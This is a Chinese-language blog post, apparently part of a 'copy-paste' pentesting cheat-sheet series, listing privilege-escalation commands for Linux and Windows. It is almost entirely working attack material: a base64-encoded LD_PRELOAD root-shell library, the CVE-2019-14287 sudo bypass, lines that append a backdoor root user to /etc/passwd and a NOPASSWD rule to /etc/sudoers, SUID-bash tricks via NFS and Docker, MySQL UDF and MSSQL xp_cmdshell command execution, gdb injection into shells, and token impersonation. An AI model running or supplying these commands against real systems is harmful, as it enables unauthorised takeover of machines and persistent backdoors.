系统提权


系统内核

Linux

uname -a && cat /etc/*-release

Windows

#https://i.hacking8.com/tiquan
systeminfo | findstr "OS KB"

错误配置

Linux

#NOPASSWD
sudo -l
#LD_PRELOAD
echo I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgp2b2lkIF9pbml0KCkgewoJdW5zZXRlbnYoIkxEX1BSRUxPQUQiKTsKCXNldGdpZCgwKTsKCXNldHVpZCgwKTsKCXN5c3RlbSgiL2Jpbi9zaCIpOwp9 | base64 -d > /tmp/shell.c && gcc -fPIC -shared -nostartfiles /tmp/shell.c -o /tmp/shell.so
sudo LD_PRELOAD=/tmp/shell.so <COMMAND>
#CVE-2019-14287 && (ALL, !root)
sudo -u#-1 <COMMAND>
sudo -u#4294967295 <COMMAND>
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
  • RPATH
readelf -d xxx | egrep "NEEDED|RPATH"
  • Crontab
crontab -l
ls -al /etc/cron*
ls -al /var/spool/cron/*
  • Writable
#查找可写文件
find / -writable ! -user "$(whoami)" ! -path "/sys/*" ! -path "/proc/*" -type f -exec ls -la {} \; 2>/dev/null
#/etc/sudoers
echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
#/etc/passwd
echo "user:$(openssl passwd -1 admin@888..):0:0:user:/:/bin/bash" >> /etc/passwd

Windows

  • ServicePermission
use exploit/windows/local/service_permissions
  • TrustedServicePath
use exploit/windows/local/unquoted_service_path
wmic service get name, pathname, startmode | findstr /i "Auto Manual" | findstr /i /v "Windows ""
  • AlwaysInstallElevated
use exploit/windows/local/always_install_elevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

应用服务

Linux

  • NFS
#/etc/exports && no_root_squash
showmount -e x.x.x.x
mount -t nfs x.x.x.x:/yyyy /mnt
cd /mnt && cp /bin/bash . && chmod u+s bash
  • MySQL
sqlmap -d "mysql://user:passwd@host:3306/mysql" --os-shell
  • Docker
docker run -it --rm -v /:/host alpine
cd /host/tmp && cp /host/bin/bash . && chmod u+s bash

Windows

  • MySQL
/* 查看版本 */
select version();
/* 读写文件(NULL=>禁止, 空=>允许) */
show variables like "secure_file_priv";
/* 插件目录 */
show variables like "%plugin%";
/* UDF && MySQL<5.1 (C:/Windows/System32/), MySQL>5.1 (MySQL/lib/plugin/) */
select 0x4d5a900... into dumpfile "xxx";
create function sys_eval returns string soname "UDF.dll";
select sys_eval("whoami");
drop function sys_eval;
/* MOF && Windows<=2003 */
use exploit/windows/mysql/mysql_mof
  • MSSQL
/* xp_cmdshell */
exec sp_configure "show advanced options", 1; reconfigure;
exec sp_configure "xp_cmdshell", 1; reconfigure;
exec master..xp_cmdshell "whoami";
/* sp_oacreate */
exec sp_configure "show advanced options", 1; reconfigure;
exec sp_configure "Ole Automation Procedures", 1; reconfigure;
declare @shell int exec sp_oacreate "wscript.shell", @shell output exec sp_oamethod @shell, "run", null, "C:\Windows\System32\cmd.exe /c whoami"

令牌操纵

Linux

#/proc/sys/kernel/yama/ptrace_scope == 0
for PID in $(pgrep "^(bash|dash|sh|zsh)$" -u $(id -u)); do echo "call system(\"echo | sudo -S chmod +s /bin/sh &>/dev/null\")" | gdb -q -n -p $PID &>/dev/null; done

Windows

  • Meterpreter
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
SweetPotato.exe -e PrintSpoofer -a "whoami"

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
边界突破 边界突破
╔═══════════════╗
║ “复制粘贴” 之边界突破 ║
╚═══════════════╝
2021-03-07
下一篇 
权限维持 权限维持
╔═══════════════╗
║ “复制粘贴” 之权限维持 ║
╚═══════════════╝
2021-03-01
  目录